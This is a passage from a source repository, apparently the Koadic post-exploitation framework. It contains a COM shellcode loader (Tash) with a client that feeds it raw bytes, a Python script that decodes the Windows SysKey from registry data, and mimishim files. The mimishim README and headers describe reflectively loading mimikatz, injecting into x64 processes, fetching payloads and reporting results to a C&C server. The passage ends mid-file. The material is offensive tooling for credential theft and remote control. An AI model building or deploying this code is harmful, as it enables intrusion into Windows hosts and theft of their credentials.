/data/bin/Tash/Tash/TashLoader.h: -------------------------------------------------------------------------------- 1 | // TashLoader.h : Declaration of the CTashLoader 2 | 3 | #pragma once 4 | #include "resource.h" // main symbols 5 | 6 | #include "Tash_i.h" 7 | 8 | 9 | #if defined(_WIN32_WCE) && !defined(_CE_DCOM) && !defined(_CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA) 10 | #error "Single-threaded COM objects are not properly supported on Windows CE platform, such as the Windows Mobile platforms that do not include full DCOM support. Define _CE_ALLOW_SINGLE_THREADED_OBJECTS_IN_MTA to force ATL to support creating single-thread COM object's and allow use of it's single-threaded COM object implementations. The threading model in your rgs file was set to 'Free' as that is the only threading model supported in non DCOM Windows CE platforms." 11 | #endif 12 | 13 | 14 | 15 | // CTashLoader 16 | 17 | class ATL_NO_VTABLE CTashLoader : 18 | public CComObjectRootEx, 19 | public CComCoClass, 20 | public IDispatchImpl 21 | { 22 | public: 23 | CTashLoader() 24 | { 25 | } 26 | 27 | DECLARE_REGISTRY_RESOURCEID(IDR_TASHLOADER) 28 | 29 | 30 | BEGIN_COM_MAP(CTashLoader) 31 | COM_INTERFACE_ENTRY(ITashLoader) 32 | COM_INTERFACE_ENTRY(IDispatch) 33 | END_COM_MAP() 34 | 35 | 36 | 37 | DECLARE_PROTECT_FINAL_CONSTRUCT() 38 | 39 | HRESULT FinalConstruct() 40 | { 41 | return S_OK; 42 | } 43 | 44 | void FinalRelease() 45 | { 46 | } 47 | 48 | public: 49 | 50 | STDMETHOD(Load)(BSTR sCode, BSTR sParam, ULONG dwOffset, ULONG* dwErr); 51 | }; 52 | 53 | OBJECT_ENTRY_AUTO(__uuidof(TashLoader), CTashLoader) 54 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/TashLoader.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | Tash.TashLoader.1 = s 'TashLoader Class' 4 | { 5 | CLSID = s '{6AA5DEAB-5B77-4D09-BD8D-8EE26F2964AA}' 6 | } 7 | Tash.TashLoader = s 'TashLoader Class' 8 | { 9 | CLSID = s '{6AA5DEAB-5B77-4D09-BD8D-8EE26F2964AA}' 10 | CurVer = s 'Tash.TashLoader.1' 11 | } 12 | NoRemove CLSID 13 | { 14 | ForceRemove {6AA5DEAB-5B77-4D09-BD8D-8EE26F2964AA} = s 'TashLoader Class' 15 | { 16 | ProgID = s 'Tash.TashLoader.1' 17 | VersionIndependentProgID = s 'Tash.TashLoader' 18 | ForceRemove 'Programmable' 19 | InprocServer32 = s '%MODULE%' 20 | { 21 | val ThreadingModel = s 'Both' 22 | } 23 | 'TypeLib' = s '{830CFF36-9188-45DF-9EF3-D14C1D12A3A4}' 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/Tash_i.c: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* this ALWAYS GENERATED file contains the IIDs and CLSIDs */ 4 | 5 | /* link this file in with the server and any clients */ 6 | 7 | 8 | /* File created by MIDL compiler version 7.00.0500 */ 9 | /* at Mon Mar 25 00:42:22 2019 10 | */ 11 | /* Compiler settings for .\Tash.idl: 12 | Oicf, W1, Zp8, env=Win32 (32b run) 13 | protocol : dce , ms_ext, c_ext, robust 14 | error checks: stub_data 15 | VC __declspec() decoration level: 16 | __declspec(uuid()), __declspec(selectany), __declspec(novtable) 17 | DECLSPEC_UUID(), MIDL_INTERFACE() 18 | */ 19 | //@@MIDL_FILE_HEADING( ) 20 | 21 | #pragma warning( disable: 4049 ) /* more than 64k source lines */ 22 | 23 | 24 | #ifdef __cplusplus 25 | extern "C"{ 26 | #endif 27 | 28 | 29 | #include 30 | #include 31 | 32 | #ifdef _MIDL_USE_GUIDDEF_ 33 | 34 | #ifndef INITGUID 35 | #define INITGUID 36 | #include 37 | #undef INITGUID 38 | #else 39 | #include 40 | #endif 41 | 42 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 43 | DEFINE_GUID(name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) 44 | 45 | #else // !_MIDL_USE_GUIDDEF_ 46 | 47 | #ifndef __IID_DEFINED__ 48 | #define __IID_DEFINED__ 49 | 50 | typedef struct _IID 51 | { 52 | unsigned long x; 53 | unsigned short s1; 54 | unsigned short s2; 55 | unsigned char c[8]; 56 | } IID; 57 | 58 | #endif // __IID_DEFINED__ 59 | 60 | #ifndef CLSID_DEFINED 61 | #define CLSID_DEFINED 62 | typedef IID CLSID; 63 | #endif // CLSID_DEFINED 64 | 65 | #define MIDL_DEFINE_GUID(type,name,l,w1,w2,b1,b2,b3,b4,b5,b6,b7,b8) \ 66 | const type name = {l,w1,w2,{b1,b2,b3,b4,b5,b6,b7,b8}} 67 | 68 | #endif !_MIDL_USE_GUIDDEF_ 69 | 70 | MIDL_DEFINE_GUID(IID, IID_ITashLoader,0x5FF70415,0x14AE,0x403D,0xAA,0xDD,0xA7,0x97,0x34,0x8C,0x89,0x67); 71 | 72 | 73 | MIDL_DEFINE_GUID(IID, LIBID_TashLib,0x830CFF36,0x9188,0x45DF,0x9E,0xF3,0xD1,0x4C,0x1D,0x12,0xA3,0xA4); 74 | 75 | 76 | MIDL_DEFINE_GUID(CLSID, CLSID_TashLoader,0x6AA5DEAB,0x5B77,0x4D09,0xBD,0x8D,0x8E,0xE2,0x6F,0x29,0x64,0xAA); 77 | 78 | #undef MIDL_DEFINE_GUID 79 | 80 | #ifdef __cplusplus 81 | } 82 | #endif 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dlldata.c: -------------------------------------------------------------------------------- 1 | /********************************************************* 2 | DllData file -- generated by MIDL compiler 3 | 4 | DO NOT ALTER THIS FILE 5 | 6 | This file is regenerated by MIDL on every IDL file compile. 7 | 8 | To completely reconstruct this file, delete it and rerun MIDL 9 | on all the IDL files in this DLL, specifying this file for the 10 | /dlldata command line option 11 | 12 | *********************************************************/ 13 | 14 | #define PROXY_DELEGATION 15 | 16 | #include 17 | 18 | #ifdef __cplusplus 19 | extern "C" { 20 | #endif 21 | 22 | EXTERN_PROXY_FILE( Tash ) 23 | 24 | 25 | PROXYFILE_LIST_START 26 | /* Start of list */ 27 | REFERENCE_PROXY_FILE( Tash ), 28 | /* End of list */ 29 | PROXYFILE_LIST_END 30 | 31 | 32 | DLLDATA_ROUTINES( aProxyFileList, GET_DLL_CLSID ) 33 | 34 | #ifdef __cplusplus 35 | } /*extern "C" */ 36 | #endif 37 | 38 | /* end of generated dlldata file */ 39 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dlldatax.c: -------------------------------------------------------------------------------- 1 | // wrapper for dlldata.c 2 | 3 | #ifdef _MERGE_PROXYSTUB // merge proxy stub DLL 4 | 5 | #define REGISTER_PROXY_DLL //DllRegisterServer, etc. 6 | 7 | #define _WIN32_WINNT 0x0500 //for WinNT 4.0 or Win95 with DCOM 8 | #define USE_STUBLESS_PROXY //defined only with MIDL switch /Oicf 9 | 10 | #pragma comment(lib, "rpcns4.lib") 11 | #pragma comment(lib, "rpcrt4.lib") 12 | 13 | #define ENTRY_PREFIX Prx 14 | 15 | #include "dlldata.c" 16 | #include "Tash_p.c" 17 | 18 | #endif //_MERGE_PROXYSTUB 19 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dlldatax.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifdef _MERGE_PROXYSTUB 4 | 5 | extern "C" 6 | { 7 | BOOL WINAPI PrxDllMain(HINSTANCE hInstance, DWORD dwReason, 8 | LPVOID lpReserved); 9 | STDAPI PrxDllCanUnloadNow(void); 10 | STDAPI PrxDllGetClassObject(REFCLSID rclsid, REFIID riid, LPVOID* ppv); 11 | STDAPI PrxDllRegisterServer(void); 12 | STDAPI PrxDllUnregisterServer(void); 13 | } 14 | 15 | #endif 16 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Implementation of DllMain. 2 | 3 | #include "stdafx.h" 4 | #include "resource.h" 5 | #include "Tash_i.h" 6 | #include "dllmain.h" 7 | #include "dlldatax.h" 8 | 9 | CTashModule _AtlModule; 10 | 11 | // DLL Entry Point 12 | extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) 13 | { 14 | MessageBoxW(NULL, L"Tash loaded!", L"Tash", MB_OK); 15 | #ifdef _MERGE_PROXYSTUB 16 | if (!PrxDllMain(hInstance, dwReason, lpReserved)) 17 | return FALSE; 18 | #endif 19 | hInstance; 20 | return _AtlModule.DllMain(dwReason, lpReserved); 21 | } 22 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/dllmain.h: -------------------------------------------------------------------------------- 1 | // dllmain.h : Declaration of module class. 2 | 3 | class CTashModule : public CAtlDllModuleT< CTashModule > 4 | { 5 | public : 6 | DECLARE_LIBID(LIBID_TashLib) 7 | DECLARE_REGISTRY_APPID_RESOURCEID(IDR_TASH, "{15CC4D83-F062-4D2F-AFFD-645527ED9C67}") 8 | }; 9 | 10 | extern class CTashModule _AtlModule; 11 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by Tash.rc 4 | // 5 | #define IDS_PROJNAME 100 6 | #define IDR_TASH 101 7 | #define IDR_TASHLOADER 102 8 | 9 | // Next default values for new objects 10 | // 11 | #ifdef APSTUDIO_INVOKED 12 | #ifndef APSTUDIO_READONLY_SYMBOLS 13 | #define _APS_NEXT_RESOURCE_VALUE 201 14 | #define _APS_NEXT_COMMAND_VALUE 32768 15 | #define _APS_NEXT_CONTROL_VALUE 201 16 | #define _APS_NEXT_SYMED_VALUE 103 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // Tash.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, 3 | // but are changed infrequently 4 | 5 | #pragma once 6 | 7 | #ifndef STRICT 8 | #define STRICT 9 | #endif 10 | 11 | #include "targetver.h" 12 | 13 | #define _ATL_APARTMENT_THREADED 14 | #define _ATL_NO_AUTOMATIC_NAMESPACE 15 | 16 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit 17 | 18 | #include "resource.h" 19 | #include 20 | #include 21 | #include 22 | 23 | using namespace ATL; 24 | -------------------------------------------------------------------------------- /data/bin/Tash/Tash/targetver.h: -------------------------------------------------------------------------------- 1 | 2 | #pragma once 3 | 4 | // The following macros define the minimum required platform. The minimum required platform 5 | // is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run 6 | // your application. The macros work by enabling all features available on platform versions up to and 7 | // including the version specified. 8 | 9 | // Modify the following defines if you have to target a platform prior to the ones specified below. 10 | // Refer to MSDN for the latest info on corresponding values for different platforms. 11 | #ifndef WINVER // Specifies that the minimum required platform is Windows Vista. 12 | #define WINVER 0x0600 // Change this to the appropriate value to target other versions of Windows. 13 | #endif 14 | 15 | #ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista. 16 | #define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows. 17 | #endif 18 | 19 | #ifndef _WIN32_WINDOWS // Specifies that the minimum required platform is Windows 98. 20 | #define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later. 21 | #endif 22 | 23 | #ifndef _WIN32_IE // Specifies that the minimum required platform is Internet Explorer 7.0. 24 | #define _WIN32_IE 0x0700 // Change this to the appropriate value to target other versions of IE. 25 | #endif 26 | 27 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : TashClient Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this TashClient application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your TashClient application. 9 | 10 | 11 | TashClient.vcproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | TashClient.cpp 18 | This is the main application source file. 19 | 20 | ///////////////////////////////////////////////////////////////////////////// 21 | Other standard files: 22 | 23 | StdAfx.h, StdAfx.cpp 24 | These files are used to build a precompiled header (PCH) file 25 | named TashClient.pch and a precompiled types file named StdAfx.obj. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other notes: 29 | 30 | AppWizard uses "TODO:" comments to indicate parts of the source code you 31 | should add to or customize. 32 | 33 | ///////////////////////////////////////////////////////////////////////////// 34 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/TashClient.cpp: -------------------------------------------------------------------------------- 1 | // TashClient.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | #include 7 | 8 | void ErrorDescription(HRESULT hr) 9 | { 10 | TCHAR* szErrMsg; 11 | if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM, NULL, hr, 12 | MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPTSTR)&szErrMsg, 0, NULL) != 0) 13 | { 14 | std::wcout << szErrMsg << std::endl; 15 | LocalFree(szErrMsg); 16 | } 17 | else 18 | { 19 | std::cout << "Could not find a description for error 0x" << std::hex << hr << std::dec << std::endl; 20 | } 21 | } 22 | 23 | int _tmain(int argc, _TCHAR* argv[]) 24 | { 25 | CoInitializeEx(0, COINIT_MULTITHREADED); 26 | 27 | ACTCTX actCtx = { 0 }; 28 | actCtx.cbSize = sizeof(ACTCTX); 29 | actCtx.lpSource = L"Tash.X.manifest"; 30 | 31 | HANDLE hCtx = CreateActCtx(&actCtx); 32 | 33 | if (hCtx != INVALID_HANDLE_VALUE) 34 | { 35 | ULONG_PTR cookie; 36 | if (::ActivateActCtx(hCtx, &cookie)) 37 | { 38 | { 39 | ITashLoaderPtr ptr; 40 | HRESULT hr = ptr.CreateInstance(__uuidof(TashLoader)); 41 | 42 | if (SUCCEEDED(hr)) 43 | { 44 | BSTR sCode = SysAllocString(L"\xcc\x90\x90\xc3"); 45 | std::cout << ptr->Load(sCode, (BSTR)NULL, 1) << std::endl; 46 | 47 | SysFreeString(sCode); 48 | } 49 | 50 | ErrorDescription(hr); 51 | } 52 | 53 | DeactivateActCtx(0, cookie); 54 | } 55 | } 56 | 57 | 58 | CoUninitialize(); 59 | 60 | return 0; 61 | } 62 | 63 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // TashClient.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #define _WIN32_DCOM 9 | #define _WIN32_FUSION 0x0100 10 | 11 | #include "targetver.h" 12 | 13 | #include 14 | #include 15 | 16 | 17 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit 18 | 19 | #include 20 | #include 21 | 22 | #import "..\Release\Tash.dll" no_namespace 23 | 24 | // TODO: reference additional headers your program requires here 25 | -------------------------------------------------------------------------------- /data/bin/Tash/TashClient/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // The following macros define the minimum required platform. The minimum required platform 4 | // is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run 5 | // your application. The macros work by enabling all features available on platform versions up to and 6 | // including the version specified. 7 | 8 | // Modify the following defines if you have to target a platform prior to the ones specified below. 9 | // Refer to MSDN for the latest info on corresponding values for different platforms. 10 | #ifndef WINVER // Specifies that the minimum required platform is Windows Vista. 11 | #define WINVER 0x0600 // Change this to the appropriate value to target other versions of Windows. 12 | #endif 13 | 14 | #ifndef _WIN32_WINNT // Specifies that the minimum required platform is Windows Vista. 15 | #define _WIN32_WINNT 0x0600 // Change this to the appropriate value to target other versions of Windows. 16 | #endif 17 | 18 | #ifndef _WIN32_WINDOWS // Specifies that the minimum required platform is Windows 98. 19 | #define _WIN32_WINDOWS 0x0410 // Change this to the appropriate value to target Windows Me or later. 20 | #endif 21 | 22 | #ifndef _WIN32_IE // Specifies that the minimum required platform is Internet Explorer 7.0. 23 | #define _WIN32_IE 0x0700 // Change this to the appropriate value to target other versions of IE. 24 | #endif 25 | -------------------------------------------------------------------------------- /data/bin/decode_syskey.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import sys 4 | 5 | syskey_data_file = sys.argv[1] 6 | 7 | tmp_syskey = "" 8 | syskey = "" 9 | with open(syskey_data_file, 'rb') as syskeyfile: 10 | file_contents = syskeyfile.read() 11 | 12 | i = 4220 13 | while i < 28811: 14 | j = i + 15 15 | while i < j: 16 | tmp_syskey += file_contents[i:i+1].decode() 17 | i += 2 18 | i += 8176 19 | 20 | tmp_syskey = list(map(''.join, zip(*[iter(tmp_syskey)]*2))) 21 | 22 | transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7] 23 | for i in transforms: 24 | syskey += tmp_syskey[i] 25 | 26 | print("decoded SysKey: 0x%s" % syskey) 27 | -------------------------------------------------------------------------------- /data/bin/dynwrapx.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/dynwrapx.dll -------------------------------------------------------------------------------- /data/bin/mimishim.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/mimishim.dll -------------------------------------------------------------------------------- /data/bin/mimishim.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/offsecginger/koadic/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/bin/mimishim.x64.dll -------------------------------------------------------------------------------- /data/bin/mimishim/README.md: -------------------------------------------------------------------------------- 1 | # mimishim 2 | 3 | mimishim.dll is a reflective DLL that shims Koadic C3 and powerkatz.dll 4 | 5 | Screenshot: http://shellcorp.org/koadikatz.png 6 | 7 | ### Methodology 8 | 9 | Several issues arise when trying to use the "well-known" powerkatz.dll straight from a Koadic job. 10 | 11 | 1. We might be an x86 process on x64 CPU, you need to be in the same arch process for mimikatz to work correctly 12 | 2. We cannot reflectively load with a stub in JScript (Empire does it all in PowerShell) because we will run out of instructions ("A script is taking too long, want to continue?" dialog) 13 | 3. Even if powerkatz.dll just used normal reflective injection instead, Wow64->x64 still requires a ton of shellcode sorcery 14 | 15 | So we have this shim DLL that has the reflective loader built in and uses a pre-calculated offset to minimize the JScript code. 16 | 17 | DllMain basically does the following: 18 | 19 | 1. Detect if WOW64 Process (aka x86) 20 | 2. If WOW64, create an x64 process and inject x64 version of self into it (aforementioned sorcery) 21 | 3. If x64, reflectively load powerkatz.dll and call it. 22 | 4. DllMain's lpParam contains strings of UUIDs, the mimikatz command to run, and the C&C callhome URL. 23 | 24 | There is also network code built-in so it can report back to the C&C server. 25 | 26 | ### Build Notes 27 | 28 | - Build x64 version first 29 | - Get pre-calculated offset via inject.x64.exe 30 | - Insert x64 offset into koadic_process.c 31 | - Build x86 32 | - Get pre-calculated offset via inject.exe 33 | - Insert x86 offset into mimikatz_dynwrapx.py 34 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/.gitignore: -------------------------------------------------------------------------------- 1 | Release/ 2 | Debug/ 3 | x64/ 4 | dll/Release/ 5 | dll/Debug/ 6 | dll/reflective_dll.vcproj.*.user 7 | dll/reflective_dll.vcxproj.user 8 | inject/Release/ 9 | inject/Debug/ 10 | inject/inject.vcproj.*.user 11 | inject/inject.vcxproj.user 12 | rdi.ncb 13 | rdi.suo 14 | rdi.sdf 15 | rdi.opensdf 16 | rdi.v11.suo -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/LICENSE.txt: -------------------------------------------------------------------------------- 1 | Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, are permitted 5 | provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this list of 8 | conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, this list of 11 | conditions and the following disclaimer in the documentation and/or other materials provided 12 | with the distribution. 13 | 14 | * Neither the name of Harmony Security nor the names of its contributors may be used to 15 | endorse or promote products derived from this software without specific prior written permission. 16 | 17 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 18 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND 19 | FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 20 | CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 21 | CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 22 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 23 | THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 24 | OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 25 | POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_load.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef WIN32_LEAN_AND_MEAN 4 | #define WIN32_LEAN_AND_MEAN 5 | #endif 6 | #include 7 | 8 | HMODULE WINAPI powerkatz_reflective_load(LPVOID lpPowerkatz, LPVOID lpParameter); 9 | wchar_t * WINAPI powerkatz_invoke(HMODULE hPowerKatz, LPCWSTR input); -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_net.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #ifndef WIN32_LEAN_AND_MEAN 4 | #define WIN32_LEAN_AND_MEAN 5 | #endif 6 | #include 7 | #include 8 | #include 9 | 10 | #pragma comment(lib, "Wininet.lib") 11 | 12 | #include "koadic_types.h" 13 | 14 | BOOL koadic_http_request(LPCSTR host, WORD port, BOOL secure, LPCSTR verb, LPCSTR path, LPCSTR szHeaders, SIZE_T nHeaderSize, 15 | LPCSTR postData, SIZE_T nPostDataSize, char **data, LPDWORD dwDataSize); 16 | 17 | BOOL koadic_http_get_x64_shim(koadic_shim_parsed *parsed, char **data, LPDWORD dwSize); 18 | BOOL koadic_http_get_powerkatz(koadic_shim_parsed *parsed, char **data, LPDWORD dwSize); 19 | 20 | BOOL koadic_http_report_work(koadic_shim_parsed *parsed, char *work); 21 | BOOL koadic_http_report_error(koadic_shim_parsed *parsed, char *work); -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_process.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include "koadic_types.h" 6 | 7 | #define MIMISHIM_X64_OFFSET 7620 8 | 9 | 10 | BOOL koadic_create_sysnative_process(LPCSTR program, LPDWORD dwPID); 11 | BOOL koadic_fork_x64(koadic_shim_parsed *parsed, LPWSTR lpParam, char *data, DWORD dwDataSize); 12 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_types.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | // strcpy 4 life-- it was a buffalo overflow, in the heart of the shellcode 6 | #if (_MSC_VER >= 1400) // Check MSC version 7 | #pragma warning(disable: 4996) // Disable deprecation 8 | #endif 9 | 10 | #pragma pack(push, 1) 11 | 12 | typedef struct _koadic_shim_parsed { 13 | CHAR host[512]; 14 | CHAR path[512]; 15 | WORD port; 16 | BOOL secure; 17 | CHAR uuidHeader[100]; 18 | CHAR uuidMimix86[40]; 19 | CHAR uuidMimix64[40]; 20 | CHAR uuidShimx64[40]; 21 | CHAR mimicmd[100]; // 'twas a buffalo overflow 22 | } koadic_shim_parsed; 23 | 24 | #pragma pack(pop) -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/koadic_util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include "koadic_types.h" 6 | 7 | BOOL koadic_get_debug_priv(); 8 | BOOL koadic_cpu_matches_process(); 9 | 10 | // proposed buffalo format: 11 | // UUIDHEADER~~UUIDSHIMX64~~UUIDMIMIKATZX86~~UUIDMIMIKATZ64~~WORKURL 12 | BOOL koadic_parse_shim(LPWSTR buffalo, koadic_shim_parsed *parsed); -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | 22 | 23 | Header Files 24 | 25 | 26 | Header Files 27 | 28 | 29 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/dll/mimishim.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual C++ Express 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mimishim", "mimishim.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 13 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 14 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 15 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/inject.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual C++ Express 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject.vcproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32 13 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32 14 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32 15 | {EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/inject.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | 14 | 15 | Source Files 16 | 17 | 18 | Source Files 19 | 20 | 21 | Source Files 22 | 23 | 24 | 25 | 26 | Header Files 27 | 28 | 29 | Header Files 30 | 31 | 32 | Header Files 33 | 34 | 35 | -------------------------------------------------------------------------------- /data/bin/mimishim/ReflectiveDLLInjection/inject/src/GetProcAddressR.h: -------------------------------------------------------------------------------- 1 | //===============================================================================================// 2 | // Copyright 